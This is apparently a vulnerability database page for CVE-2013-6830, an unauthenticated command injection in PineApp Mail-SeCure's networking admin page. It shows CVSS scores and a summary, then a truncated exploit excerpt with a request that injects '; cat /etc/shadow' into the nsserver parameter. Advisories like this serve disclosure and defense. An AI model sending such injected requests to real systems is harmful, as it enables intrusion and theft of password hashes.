7.5
CVSSv2

CVE-2013-6830

Published: 20/11/2013 Updated: 25/11/2013
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

admin/confnetworking.html in PineApp Mail-SeCure 3.70 and previous versions on 5099SK and previous versions platforms allows remote malicious users to execute arbitrary commands via shell metacharacters in the nsserver parameter during an nslookup operation.

Vulnerable Product Search on Vulmon Subscribe to Product

pineapp mail-secure 5099sk

Exploits

----------------------------------------------------------------- It is possible execute any command bash as qmailq unprivilege user, sending only the following https request, without authentication 1921682424:7443/admin/confnetworkinghtml?cmd=nslookup&hostip=&nstype=any&nsserver=wwwgooglees;%20cat%20/etc/shadow To uploa ...